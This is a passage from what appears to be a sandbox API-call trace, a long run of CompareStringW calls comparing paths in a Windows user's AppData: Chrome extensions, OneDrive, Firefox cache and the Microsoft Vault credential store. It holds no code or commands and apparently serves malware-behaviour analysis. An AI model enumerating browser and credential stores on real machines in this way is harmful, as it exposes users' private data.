Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\", cchCount2=139) returned 3 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\", cchCount2=128) returned 3 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\", cchCount2=128) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\", cchCount2=128) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\", cchCount2=128) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\", cchCount2=128) returned 3 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\", cchCount2=73) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\", cchCount2=73) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\", cchCount2=73) returned 3 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\", cchCount2=73) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\", cchCount2=73) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount2=129) returned 3 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount2=129) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount2=129) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount2=129) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount2=129) returned 3 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\\", cchCount2=89) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\\", cchCount2=89) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\\", cchCount2=89) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\\", cchCount2=89) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\\", cchCount2=89) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount2=72) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount2=72) returned 3 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount2=72) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount1=72, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount2=72) returned 2 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\", cchCount2=73) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\", cchCount2=73) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\", cchCount2=73) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\", cchCount2=73) returned 3 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\", cchCount2=73) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\", cchCount2=77) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\", cchCount2=77) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\", cchCount2=77) returned 3 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\", cchCount2=77) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\", cchCount2=77) returned 3 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\", cchCount2=122) returned 3 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\", cchCount2=122) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\", cchCount2=122) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\", cchCount2=122) returned 3 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount1=129, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\", cchCount2=122) returned 3 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\", cchCount2=77) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\", cchCount2=77) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\", cchCount2=77) returned 3 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\", cchCount2=77) returned 3 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\", cchCount1=77, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\", cchCount2=77) returned 2 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\", cchCount2=73) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\", cchCount2=73) returned 3 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount1=72, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\", cchCount2=73) returned 3 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\", cchCount2=73) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\", cchCount1=55, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\", cchCount2=73) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount2=129) returned 3 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount2=129) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount1=129, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\", cchCount2=129) returned 2 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\", cchCount2=76) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hy\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\", cchCount2=76) returned 3 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount1=72, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\", cchCount2=76) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\", cchCount2=76) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\as-in\\", cchCount2=76) returned 3 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 3 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount1=72, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 1 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 3 [0296.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 2 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\", cchCount2=134) returned 3 [0296.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 